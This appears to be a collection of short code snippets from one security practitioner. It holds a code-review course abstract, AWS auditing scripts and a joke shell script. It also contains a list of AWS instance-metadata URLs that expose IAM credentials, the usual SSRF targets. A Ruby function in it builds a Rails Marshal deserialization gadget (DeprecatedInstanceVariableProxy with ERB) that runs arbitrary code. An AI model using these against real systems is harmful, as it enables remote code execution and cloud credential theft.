cktricky

Course Abstract:

Ready to take your bug hunting to a deeper level? Ever been tasked with reviewing actual source for SQL Injection, XSS, Access Control and other security flaws? Does the idea of reviewing this code leave you with heartburn? This course introduces a proven methodology and framework for performing a secure code review, as well as addressing common challenges in modern secure code review. Short circuit developing individual secure code review techniques by gleaning from Seth & Ken's past adventures in performing hundreds of code reviews and the lessons we’ve learned along the way. We will share a proven methodology to perform security analysis of any source code repository and suss out security flaws, no matter the size of the code base, or the framework, or the language.

Course Objectives:

This course introduces security professionals and software developers to the nitty/gritty details of performing a code review. Specifically, the course will impart the following to attendees:

• Code Revi

cktricky

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

cktricky

import boto3
import pprint

pp = pprint.PrettyPrinter(indent=5, width=80, compact=False)

#http://docs.aws.amazon.com/general/latest/gr/rande.html
regions = ['us-east-1', 'us-west-2', 'ap-northeast-2', 'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1', 'eu-central-1', 'eu-west-1']


'''

cktricky

import boto3
import pprint

# MAKE SURE YOU CHANGE THESE VALUES OR THE TOOL WON'T WORK.
access_key_id = 'replace me' 
secret_access_key = 'replace me'

'''
WORK IN PROGRESS, NOT COMPLETED
This file is used to review s3 bucket permissions and whether or not they are encrypted

cktricky

import boto3
import pprint

# MAKE SURE YOU CHANGE THESE VALUES OR THE TOOL WON'T WORK.
access_key_id = 'replace me' 
secret_access_key = 'replace me'


'''
This file is used to list EBS volumes and whether or not they are encrypted. This is only for "in-use" (running) volumes.

cktricky

var AWS = require('aws-sdk');
var url = require('url');
var https = require('https');
var hookUrl, kmsEncyptedHookUrl, slackChannel;


kmsEncyptedHookUrl = 'abcd1234';  // Enter the base-64 encoded, encrypted key (CiphertextBlob)
slackChannel = 'example_channel';  // Enter the Slack channel to send a message to

var postMessage = function(message, callback) {

cktricky

import boto3
from itertools import chain
import csv


'''
Goal)

Create a matrix (csv) that consists of (and is used in an excel file capacity):
 *** List out each policy (Managed and Inline) that are attached to a user.

cktricky

#!/usr/bin/env ruby

require 'aws-sdk'

sts = Aws::STS::Client.new(
  region: 'us-east-1',
  access_key_id: "<insert access key id>",
  secret_access_key: "<secret>"
)

cktricky

say 'push me, and then just touch me, so I can get my, satisfaction' && \
say -v victoria 'push me, and then just touch me, so I can get my, satisfaction' && \
say -v victoria 'satisfaction' &&\
say 'boing, boom tschak,,,boing, boom tschak'

cktricky

def test
  code = "eval('puts \"hello\"')"
  return Base64.encode64 "\x04\x08" +
        "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
          ":\x0E@instance" +
            "o"+":\x08ERB"+"\x06" +
              ":\x09@src" +
                Marshal.dump(code)[2..-1] +
          ":\x0C@method"+":\x0Bresult"
end